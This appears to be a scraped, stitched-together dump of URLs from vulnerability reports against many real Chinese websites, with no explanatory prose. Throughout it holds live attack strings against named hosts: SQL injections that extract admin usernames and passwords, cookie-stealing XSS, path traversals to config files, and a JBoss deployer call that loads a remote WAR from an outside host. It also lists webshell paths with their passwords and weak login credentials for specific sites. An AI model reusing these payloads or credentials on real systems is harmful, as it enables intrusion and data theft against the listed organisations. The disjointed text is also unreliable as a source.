http://www.cnsportslottery.cn/ www.cnsportslottery.cn http://www.cnsportslottery.cn http://**.**.**.**/main1.action,如图: http://www.gzxijiu.cn:8080/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://122.224.86.103/index.jsp https://mail.sunyard.com http://oa.sunyard.com.cn/seeyon/main.do http://**.**.**.**/system/userPurview/toLogin http://**.**.**.**/portal/index.php?c=main&a=index&t=0&menuId=1&id=1&mpId=1 http://www.huinet.cn/ http://www.pzyuebao.com/是个小网站,搞篮球培训的,相对好挖。 http://www.10quan.cn/ http://**.**.**.**/seeyon//logs/ctp.log http://**.**.**.**/seeyon/ http://**.**.**.**:8888/jwgkweb/zdgk/zdgk!view.do?jwZdid=402894924a6660ca014a66942910000c http://**.**.**.**:8888/ fce8:8b46:86c4%15]:3343 ae62:9a07:da05%15]:49253 fce8:8b46:86c4%15]:49870 a91d:84fd:f67a:7306%15]:3343 http://61.155.167.220:843/ http://61.155.167.220/test.php http://zone.wooyun.org/content/23858写crontab http://***.***.***.***/shell.txt http://61.155.167.220/xiao.php J.......tion/x-m http://**.**.**.**/NewsDetail.asp?id=166 http://**.**.**.**/VideoSType.php?from=top10&BNum=1&SNum=2 http://**.**.**.**/frontend/fl/1/index.php?HotelID=513 https://**.**.**.**:8443/cas/login?service=http%3A%2F%2F**.**.**.**%3A8080%2Fportal%2F https://**.**.**.**/eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13,如图: https://**.**.**.**/eServicePublic/publicweb/office/OfficeArticle.action?chanelMap=13 redirect:/xxoo=-1 https://**.**.**.**/eServicePublic/xxoo http://**.**.**.**/bugs/wooyun-2015-0154054 http://**.**.**.**/product_list.php?k_id= http://cec.neu.edu.cn/MHSys/secindex.do?method=trainSystemQuery&sid=7&queryCode=PX_ZSCX http://www.rqzhzh.net/admin.php http://**.**.**.**/ http://**.**.**.**/user_register.jsp http://**.**.**.**/product_list.php?c1=5 http://**.**.**.**/TemplateMSG.php?TypeNO=4 http://**.**.**.**/bugs/wooyun-2015-0157039 http://115.182.79.221:8080/ http://115.182.79.221:8080/cacti/ http://115.182.79.221:8080/wordpress/ http://115.182.79.221:8080/wordpress/wp-login.php http://app.cjn.cn/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D http://app.cjn.cn/data/mysql_error_trace.inc http://app.cjn.cn/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a http://app1.cjn.cn/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3D http://app1.cjn.cn/data/mysql_error_trace.inc http://app1.cjn.cn/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a http://app1.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://byby.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://hbjs.cjn.cn/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://it.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://jkys.cjn.cn/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://lady.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://life.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://pinyou.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://wh2049.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://www.cjn.cn/hs/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://www.cjn.cn/hs/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://yazg.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://yy.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29 http://e.cjn.cn/upload.jsp http://e.cjn.cn/image.jsp http://jkys.cjn.cn/ http://XXX.**.**.**.**/webcast/ http://www.17xuexi.com/reg/reg3.asp?jz_ok=&username=admin http://www.17xuexi.com/new_web/my_info_1.asp http://www.17xuexi.com/myclass/ http://www.17xuexi.com/lipin/ http://www.17xuexi.com/payold/ http://www.17xuexi.com/laoshi/laoshi.asp http://www.17xuexi.com/jiazhang/default.asp http://www.17xuexi.com/mx.asp http://m.ruijie.com.cn/.svn/entries http://m.ruijie.com.cn/ruijie/video/play.html?ID=429&UID=CE105824-31EC-47DA-BFF5-FACD6C1254C1 https://**.**.**.** https://**.**.**.**/cplectures/include/getfile.php?file=getfile.php&filepath=../include&filename=getfile.php https://www.batiaoyu.com/stc-cooperation.htm这个页面中,我们发现有一个邮箱 http://211.144.154.230/loginSystem.action http://**.**.**.**/mmbiz/RQcjyciayU2eMbzzanf7zM7eqlekmibm5KUr7aRzxaBSkZBIMJzexcib303Exx8aahPH35Jn7nMUbqiakIPHP0UGUw/0 http://**.**.**.**/news/news.php?id=4775 http://121.34.253.167:7001/ http://club.samsung.com/uddiexplorer/SearchPublicRegistries.jsp http://m.sds.samsung.com/uddiexplorer/SearchPublicRegistries.jsp http://sds.samsung.com/uddiexplorer/SearchPublicRegistries.jsp http://www.sds.samsung.com/uddiexplorer/SearchPublicRegistries.jsp http://account.samsung.com/uddiexplorer/SearchPublicRegistries.jsp http://pvi.samsung.com/uddiexplorer/SearchPublicRegistries.jsp http://**.**.**.** http://**.**.**.**:8011 http://www.gsrjr.com/new.asp?id=334 http://**.**.**.**/anwz/index/index.jhtml中的标识链接 http://211.162.119.43/ http://www.sanyaairport.com/ http://www.sanyaairport.com/autoportal//nebula/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../../ http://www.sanyaairport.com/autoportal//nebula/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://www.greenet.net.cn/news.php?id=142 http://218.203.132.116/taixi/article.do?articleID=35894 http://218.203.132.116/taixi/channel.do?id=60062 http://m.jinjiang.com/ http://oa.tianjimedia.com/yyoa/ http://oa.tianjimedia.com/yyoa/common/selectPersonNew/initData.jsp?trueName=1 http://www.19ued.com/yaojiu/wp-login.php http://jjrtt.com/ http://202.96.126.246:8080/invoker/JMXInvokerServlet http://**.**.**.**/index.php?id=670&m=News&a=detail&showid=208 http://www.oohaney.com/ www.oohaney.com http://**.**.**.**/ http://**.**.**.**/zdsys/Manage https://mail.yueyuedai.com/mm-ms/?module=base&action=login登陆框存在SQL注入 http://www.oschina.net/news/67975/redis-defect?from=mail-notify http://bbs.baozoumanhua.com/forums/1/articles/new http://bbs.baozoumanhua.com/forums/1/articles/388479.json http://www.youzhu.com/Index/forgetPassword http://www.youzhu.com/Index/checkCode http://www.youzhu.com/Index/reg URL:http://**.**.**.**//web/ProvidentFund/list/Listzx.jsp?locationCatalog=147782&catalog=147782&catalogs=147787&catalogHelp=147781&VR_CLASS_ID=147782 http://www.svwstar.com/epss/存在Apache http://**.**.**.**:7001/console/login/LoginForm.jsp http://hr.chinawutong.com/qiuzhi/p1/?p=0%27&pv= hr.chinawutong.com/qiuzhi/p1/?p=0 http://crm.goukuai.cn/auth/login http://121.199.3.197/login http://**.**.**.**/ http://koa5.hisense.com/login.jsp;jsessionid=Zs5hWvShfPTJGhJ9zNQ3QFPKKRtq8M692SzgC4gRyGcJwd9pXslN!1123129354 http://www.greenet.net.cn/about.php?id=4 http://www.greenet.net.cn/news.php?id=157 http://www.greenet.net.cn/product.php?id=16 http://www.greenet.net.cn/fangan_xq.php?id=5 http://222.189.156.67:8089/yyoa/ http://222.189.156.67:8089/yyoa/HJ/iSignatureHtmlServer.jsp?COMMAND=DELESIGNATURE&DOCUMENTID=1&SIGNATUREID=2 http://vmi.tclking.com/ http://recruit.svw.cn/recruitment/resume/addresume/person_id/160000/lid/1/job_id/2 http://recruit.svw.cn/recruitment/resume/addresume/person_id/160000/lid/1/job_id/2 http://recruit.svw.cn/recruitment/resume/addresume/person_id/161111/lid/1/job_id/2 http://**.**.**.**/news_list.php?id=5 https://ip:8080到公网,恶意人员使用超级账号telecomadmin http://www.hiersun.com/ http://mys8.super8.com.cn:81/pages/WS/News/WS_NewsManage.aspx http://117.121.52.216:10001/debug/ http://game1-bs.ma.sdo.com:10001/debug/mst/skill/index http://www.ahzsks.cn/Non-Degree7/article.jsp?articleId=164758779 http://**.**.**.**/ http://**.**.**.**/views/content/ContentPage.xhtml?q_content_id=78582&file_num=69682&top_file_num=67336 http://oa.htfutures.com/login/login.jsp http://oa.htfutures.com/web/broswer/CustomerTypeBrowser.jsp?sqlwhere=where http://www.gykgah.com/yyoa/index.jsp http://www.gykgah.com/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@datadir http://www.gykgah.com/yyoa/welcome.jsp http://www.gykgah.cn/index.asp http://**.**.**.**/ZChart?classid=1&byclass=true&index=true http://cloud.ruijie.com.cn/rcs/login锐捷云网 http://oa.clypg.com.cn/seeyon/index.jsp http://oa.clypg.com.cn/seeyon/management/index.jsp http://oa.clypg.com.cn/seeyon/logs/login.log http://www.guodadrugstores.com/ http://www.guodadrugstores.com/admin/ http://admonitor.miaozhen.com http://store.hicling.com/ http://www.edufe.com.cn/special/mxxhg2014/galleria.php?catid=191 http://ryadmin.ruijie.com.cn/mxsoft/test.php http://**.**.**.**/bugs/wooyun-2014-061903 http://**.**.**.**/chi/product_detail.php?id=14 http://**.**.**.**/index.php?class=3 http://oa.bestv.com.cn http://oa.bestv.com.cn//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://es01.enet.com.cn/eblog/blog/htm/uid_1*.html http://www.sinopharm-sd.com/ http://www.sinopharm-sd.com/admin/admin_login.aspx http://www.gykgah.cn/ http://www.gykgah.cn/aspnet_client/system_web/ http://www.gykgah.cn/aspnet_client/ http://www.gykgah.cn/data/ http://www.gykgah.cn/images/ http://www.qh168.com.cn:8008/login/Login.jsp?logintype=1 http://www.qh168.com.cn:8008/page/element/news/more.jsp?ebaseid=news&eid=1123 http://www5.nenu.edu.cn/professor/pro/show.php?flag=1&id=228 http://**.**.**.**/plug/oem/AspCms_OEM.asp http://demo.aspcms.com/ http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**/products_list.php?conid=4 http://**.**.**.**/activity_news_detail.php?Id=1317* http://**.**.**.**/djfile_show.php?Id=23&P=4* http://www.21yod.com/ http://www.21yod.com/jmx-consoleing/ http://www.basismold.com/page/newsinfo.aspx http://**.**.**.**/biz/ http://**.**.**.**/HtmlView.aspx http://**.**.**.**/default.aspx http://**.**.**.**/AdminLogon http://**.**.**.**/imCroePlatform/business_OrderFlow_qryFlowPreview.action http://**.**.**.**:7001/hzgjjweb/ http://**.**.**.**:7001/ma/ http://huishou.dangdang.com/ http://huishou.dangdang.com/User/AddUserAddress http://**.**.**.**/index.php?option=com_contenthistory&view=history&list[select]=1,扔到sqlmap。 http://blog.techweb.com.cn/ http://www.yongche.com/order/info.php?id=订单号 http://whistle.ruijie.com.cn:60022/MS http://whistle.ruijie.com.cn:60022/MS/login.action http://whistle.ruijie.com.cn:60022/MS/88cmd.jsp http://**.**.**.**/news/display.php?id=3502&table=news http://**.**.**.**/news/more.php?part=3 http://**.**.**.**/index.php?actiontype=search&language=eng&dentist_name=hui&clinic_dist=2 http://**.**.**.**/product_list.php POST:order_by=1*&order_type=*&where=a.PId%3Db.Id&p=88952634&CateId=1&CateId=1&query=8&keyword=8&curr_order=8&order=a.Sortid%20desc http://**.**.**.** http://**.**.**.**/cht/index.php?code=list&flag=detail&ids=56&article_id=436 http://**.**.**.**/YL/dx.action存在命令执行漏洞 http://**.**.**.**/YL/test.jsp密码tom read:0000679559900 read:0000679559900 read:0000679559900 http://bangzhu.feidee.com/index.php/Index/view/id/2/f_id/25/tid/151 http://**.**.**.**/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.web%3AJ2EEApplication%3Dnone%2CJ2EEServer%3Dnone%2Cj2eeType%3DWebModule%2Cname%3D%2F%2Flocalhost%2Fjmx-consoles http://booking.lkkhpg.com//defaultroot/login.jsp http://booking.lkkhpg.com///defaultroot/extension/smartUpload.jsp?path=information&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 http://doc.creditharmony.cn/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.web%3Aj2eeType%3DWebModule%2Cname%3D%2F%2Flocalhost%2Fjmx-console%2CJ2EEApplication%3Dnone%2CJ2EEServer%3Dnone http://123.127.132.35/seeyon//logs/login.log http://123.127.132.35/seeyon/main.do?method=index http://**.**.**.**:7001/bst/ http://**.**.**.** float:righ clear:both http://124.207.220.66/ http://**.**.**.**/ http://doc.creditharmony.cn/ http://**.**.**.** www.bsgl.sh.cn www.gpsisp.com www.gps188.com www.bds188.com http://www.shbeidou.com/ http://www.longone.com.cn/main/users/resetPwd/index.html#ty http://**.**.**.**/NewsArticle.aspx?t=42&n=1233&c=27 http://**.**.**.**/huansongchen/?domain=**.**.**.** http://**.**.**.**/admin/Login.aspx http://**.**.**.**:8080/iker/index.action存在命令执行漏洞 http://bbs.svw-volkswagen.com/jifenshow.php?id=114 http://**.**.**.**/选择企业服务。打开后图中标识链接即存在漏洞 http://www.chinagps.cc/,点击图中标识链接 http://m.chinagps.cc:9999/driverBook/myCar.action存在命令执行漏洞 http://m.chinagps.cc:9999/driverBook/test.jsp密码tom http://**.**.**.** http://www.ihetou.com/camp/shequbbstielist.aspx?source=tie&w=e http://59.108.5.29/loginAction!getCookie.action http://**.**.**.**/ http://222.73.45.249/gps/doif/myLogin.jsp http://**.**.**.**/so?key=aa%27&type=1 http://**.**.**.**/Login http://222.92.3.77/ http://bbs.wildstar.com.cn/uc_server/ http://bbs.wildstar.com.cn/uc_server/Cook.php http://**.**.**.**/modules_page.php?class=1&num=4 http://**.**.**.**/ecdomain/framework/cyrsw/index.jsp http://**.**.**.**/,选择房产政务信息网,图中标识链接存在漏洞 https://github.com/ubunhu/autotest/blob/9f42f9ae8c7ade91436941e3528bd99162bf396a/tripmaster_ios/faceback.py http://mp.toutiao.com/login/ http://mp.toutiao.com http://119.29.26.237/sport/report_runner_info_step?user_id=10000&kind_id=2&distance=0.0&cost_time=0&time=1450247477&caloric=0&steps=123456&subtype=0&ver=3.1.1.4.159&client_user_id=10000 http://**.**.**.**/mathematics/wp-login.php admin:1234567 http://www.zzidc.com/main/huodong/whoIsThief.html# http://3d.vw.com.cn/brandworld/homepage.action http://mail.huatu.com http://**.**.**.**/webinfo/ccgp-web/xj_bidding.asp http://myt.cjn.cn/user/login.php http://218.202.130.42:8080/ http://epa6.enet.com.cn http://**.**.**.**/ http://bbs.touna.cn/list-22/detail-118154.html http://123.127.246.34/phpmyadmin/ http://120.24.181.120/borrow.do http://124.95.164.162:8090/ http://xietong.kingdee.com:7890/ http://xietong.kingdee.com:7890/oa/components/fck/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=../../ http://mockup.itjuzi.com:80/ http://**.**.**.**/tv/dis.php?id=363 http://mockup.itjuzi.com:80/location?id=-9414 http://**.**.**.**/ http://**.**.**.**/ http://**.**.**.**:1723/yyoa/ http://**.**.**.**:1723/yyoa/common/js/menu/test.jsp?doType=101&S1=select%20@@basedir http://**.**.**.**/bugs/wooyun-2010-0128322 http://**.**.**.**:1723/yyoa/welcome.jsp http://**.**.**.**/wp-login.php siuyinyin:12345678 http://**.**.**.**/ http://www.17tx.com/faw/news_board.php?id=2738存在IDGET类型注入。 http://**.**.**.**/htm/product_list.php?type=1 http://mailserver.juneyao.com http://**.**.**.**/tw/ http://www.jfdwy.com/item/?c-5,key-1%27.html http://www.bqjujia.com/Item/?c-5,key-1%27.html http://www.gzisc.com.cn/item/?c-5,key-1%27.html http://www.jzlj.org.cn/item/?c-5,key-1%27.html http://www.jinlaima.com/Item/?c-5,key-1%27.html http://jiadewd.com/Item/?c-5,key-1%27.html http://www.recende.com/item/?c-5,key-1%27.html http://www.gdtgw.cn/item/?c-5,key-1%27.html http://www.gmshouji.com/Item/?c-5,key-1%27.html http://210.47.176.3/page/depart/yjsy/item/?c-5,key-1%27.html http://www.jdznj.com/item/?c-5,key-1%27.html http://www.lcsflw.com/item/?c-5,key-1%27.html http://www.cdsyz.com/item/?c-5,key-1%27.html http://www.cqgmy.cn/item/?c-5,key-1%27.html http://www.njyhx.com/item/?c-5,key-1%27.html http://www.hecelaw.com/item/?c-5,key-1%27.html http://www.lsjrd.gov.cn/item/?c-5,key-1%27.html http://www.lfkj.org.cn/item/?c-5,key-1%27.html http://www.qdzhijia.com/item/?c-5,key-1%27.html http://www.gushiyouth.org.cn/item/?c-5,key-1%27.html http://www.xxqzgzb.gov.cn/item/?c-5,key-1%27.html http://www.hnxddq.cn/item/?c-5,key-1%27.html http://www.recende.com/item/?c-5,key-1%27.html http://www.xfwang.cn//item/?c-5,key-1%27.html http://www.ctyygs.com//item/?c-5,key-1%27.html http://www.lcsflw.com//item/?c-5,key-1%27.html http://www.yqhy.gov.cn//item/?c-5,key-1%27.html http://www.cqgmy.cn//item/?c-5,key-1%27.html http://www.sxpsxx.com/item/?c-5,key-1%27.html http://www.xtss.com.cn//item/?c-5,key-1%27.html http://www.jxdjw.gov.cn//item/?c-5,key-1%27.html http://www.srxdx.com/item/?c-5,key-1%27.html http://www.dggraduate.com//item/?c-5,key-1%27.html http://www.dfttkf.com//item/?c-5,key-1%27.html http://www.jdznj.com//item/?c-5,key-1%27.html http://dealer.youxinpai.com http://www.cer.sdu.edu.cn/cq/guest.php http://125.35.22.15/ http://222.73.243.130:9000//jmx-console/ system:service%3DMainDeployer&methodIndex=17&arg0=http://p2j.cn/is.war http://222.73.243.130:9000/is/cmd.jsp?pwd=023&cmd=netstat%20-an http://oa.baofoo.net/ http://gf.955s.cn:9000/ http://122.224.69.106:9000/manage/user/user_login_.action https://**.**.**.**/control/main.action http://www.umpay.com/WEB-INF/web.xml http://**.**.**.**/ProMgrTH/viewAddEnter.action http://irer.shufe.edu.cn/ http://**.**.**.**/site/news/title_c/index.php?Company_SN=21779&PHPSESSID=msn2089luncua5u8tu8o570ki2 URL:http://**.**.**.**/ http://www.5757car.com/review.php?id=165 http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/funds_smsy/PEFundService.getHowBuyData?page=1&num=10&sort=jjjz*&asc=0&ccode=&date=&month= http://**.**.**.**/ http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/TSPB/hnweb/news/news_Info.jsp?infoId=EF24548F9870834B620A71FE37D612A9 http://**.**.**.**/big5/news.asp?kind=1 http://extplat.minanins.com/console/login/LoginForm.jsp http://extplat.minanins.com/jmxroot/jmxroot.jsp http://cdcs.gwmdms.com/ ROOT.war/shell.jsp http://cdcs.gwmdms.com:8080/shell.jsp http://**.**.**.**/ http://211.148.197.137/CUTVCloudMS/desktop/desktopAction.do http://mockup.itjuzi.com:80/company/foreign?prov=-3922 http://222.73.243.227/word/wp-admin/ http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/tuan//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://www.joinbuy.eu/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://joinbuy.de//ajax.php?act=check_field&field_name=user_name&field_data=1%275 http://**.**.**.**/tuan/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/tuan/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/tuan/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**:88/groupon//ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/mei/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://**.**.**.**/ajax.php?act=check_field&field_name=user_name&field_data=1%27 http://www.3kloan.com/login.do?method=xdcp&yid=18&cid=1 http://222.73.243.217/ http://222.73.243.133//.svn/entries http://www.ytzq.com/main/index.shtml https://service.ytzq.com/service/cgi-bin/ytzq/cfzj/sso/action/LoginAction?function=login http://account2.gongfubb.com/home/admin/?ACT=AC http://account2.gongfubb.com/home/admin/UserInfo.php?UID=-37171694%20UNION%20SELECT%201,user%28%29,database%28%29,4,5,6,7,8,9,10,11,12 http://account2.gongfubb.com/home/admin/PayQuery.php?OTI=201512140846302252P11 http://job.e21.cn/dyyh/存在弱口令admin/admin,泄露部分用户信息,同时发现存在更多明文弱口令 http://**.**.**.**/malie/news.asp?y=2015 http://210.14.78.115/是天天果园的网站 http://210.14.78.115/ http://210.14.78.115//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://210.14.78.115//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource http://**.**.**.**/ns/weblogic/920/domain xmlns:sec="http://www xmlns:wls="http://**.**.**.**/ns/weblogic/90/se xmlns:xsi="http://**.**.**.**/2001/XMLSchema-instance xsi:schemaLoca http://**.**.**.**/ns/weblogic/90/security/wls http://**.**.**.**/ns/weblo http://**.**.**.**/ns/weblogic/920/domain http://www.bea http://**.**.**.**/ns/weblogic/90/security/xacml http://**.**.**.**/ns/weblogic/90/security/xacml.xsd http://**.**.**.**/ns/webl http://**.**.**.**/ns/weblogic/90/security.xsd sec:authentication-provider xsi:type="wls:default-authenticatorType sec:authentication-provider xsi:type="wls:default-identity-asserterType sec:active-type sec:active-type sec:authentication-provider sec:role-mapper xmlns:xac="http://**.**.**.**/ns/weblogic/90/security/xac xsi:type="xac:xacml-role-mapperType sec:role-mapper sec:authorizer xmlns:xac="http://**.**.**.**/ns/weblogic/90/security/xacm xsi:type="xac:xacml-authorizerType sec:authorizer sec:adjudicator xsi:type="wls:default-adjudicatorType sec:adjudicator sec:credential-mapper xsi:type="wls:default-credential-mapperType sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType sec:cert-path-provider sec:cert-path-builder sec:cert-path-builder sec:name sec:name http://hq.fruitday.com:88/ http://hq.fruitday.com:88///web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResource http://**.**.**.**/SB/news.asp?news=scholarship http://k.yiban.cn/index.php?c=useredit&a=studentdata http://cert.chemao.com.cn/ http://www.chemao.com.cn/index.php?app=showcert&car_id=953334 http://118.122.88.90:60465//web/careerapply/HrmCareerApplyPerView.jsp?id=1 http://118.122.88.90:60465//web/careerapply/HrmCareerApplyPerView.jsp?id=1%20union%20select%201,2,loginid,password,lastname,6,7%20from%20HrmResourcemanager http://shfilmds.com/index.php/cn/ http://**.**.**.**/Login.do?ReturnUrl=%2fDefault.do http://**.**.**.**/index.php/admin/index/login.html http://www.mse.zjut.edu.cn/ShowNewsPageAction.do?newsID=3338&smallClassID=55&bigClassID=2 www.cofco-property.cn/iframe.aspx?id=1* http://**.**.**.**/site/news/title_c/detail.php?Company_SN=21779&Site_News_SN=4779&PHPSESSID=9nej773dctv9mttsq0p18gva43 http://**.**.**.**:8080/SitcHR/存在Jboss反序列化漏洞。 http://111.205.44.70/app/userlogin.jsp http://60.190.113.69 http://**.**.**.**/, http://postdoctorold.ecnu.edu.cn/admin/login.aspx http://**.**.**.**/thread-264895-1-1.html http://**.**.**.** http://**.**.**.**/MobileService_tourism/manager/login_submit.asp http://**.**.**.**/bugs/wooyun-2010-0143537) http://carlife.vcyber.com http://www.ykinns.com:80/ www.ykinns.com http://hdzx.g.yy.com/activitysys/detail?act=peiwan jwgl.ujn.edu.cn/service.asmx文件中的webservice接口GetStuCheckinInfo http://www.zf_webservice.com/GetStuCheckinInfo soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/ xmlns:tns="http://tempuri.org/ xmlns:types="http://tempuri.org/encodedTypes xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/ soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ q1:GetStuCheckinInfo xmlns:q1="http://www.zf_webservice.com/GetStuCheckinInfo xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string q1:GetStuCheckinInfo soap:Body soap:Envelope http://**.**.**.**/ http://richina.com.cn/ http://www.greenwaychina.org/index.php/zh/ URL:http://yule.2258.com/mingxing/pandian/940746.html URL:http://yule.2258.com/mingxing/pandian/940746.html?id=940746 http://**.**.**.**/tnyouth/news_detail.asp?CateID=1&NewsID=29027 http://zbj.glodon.com http://zbj.glodon.com/web-console http://**.**.**.**/ http://**.**.**.**/ws/certificate/queryForWs_CertificateListLook.do http://**.**.**.**/ws/certificate/queryForWs_CertificateListLook.do http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/funds_jjpj/FundRank_Service.getHTSMFundManagerInfo?page=1&num=6&sort=new_star_level*&asc=0&ccode=&type=0&date= https://mail.midea.com http://**.**.**.**/index.php?g=Back&m=Entrance&s=login http://**.**.**.**/index1.php http://xxxxxx/background/updateactivityemailnum.php?ID=1 http://218.85.77.165:7777/ http://vip.stock.finance.sina.com.cn/fund_center/api/jsonp.php/funds_yinhe/FundRank_Service.getYHFundInfo?page=1&num=6&sort=year3grade&asc=0&ccode=&type=01*&type3=&date=&%5Bobject%20HTMLDivElement%5D=o9kgo http://**.**.**.**/web/show.asp?tname=dtcz&id=7780 http://219.146.73.48/admin/ http://**.**.**.**/ https://mail.youxinpai.com http://vip.stock.finance.sina.com.cn/fund_center/data/jsonp.php/funds_chenxing/FundRank_Service.getMSFundInfo?page=1&num=7&sort=nav*&asc=0&ccode=&type=1&type3=&date= http://es.fesco.com.cn/Esvr/Home/lostpass2?uid=xxx&ks=6f935832c7f126da4c0ee2c2db1722f9 http://**.**.**.**/ http://v2.htsc.com.cn:443 http://**.**.**.**/manage/manage.aspx http://**.**.**.**:8080/admin-console lkl.creditcard.cmbc.com.cn/admin/index.php?a=login&c=index&dosubmit=1&m=admin http://**.**.**.**/ http://**.**.**.**/zxjl_wenti_list.php?huifu=&pg=1&zxjl_type=1 icfs.swufe.edu.cn/index.php?a=download&file= icfs.swufe.edu.cn/index.php?a=download&file=index.php icfs.swufe.edu.cn/index.php?a=download&file=/framework/kernel.php icfs.swufe.edu.cn/index.php?a=download&file=/temp/configs/config.inc.php http://**.**.**.**/lm/moreinfo.asp?typeid=06 http://**.**.**.**/bud/doc/news.asp?ID=1249%20and%20exists%28select%20*%20from%20du1al%29-- http://bjidc.net/ http://**.**.**.**/sudents.php?Cata=17 http://vip.ufida.com.cn/nccsm/ http://nczx.yonyou.com/SubModule/role/ http://nczx.yonyou.com/Inc/ ftp://192.168.8.86 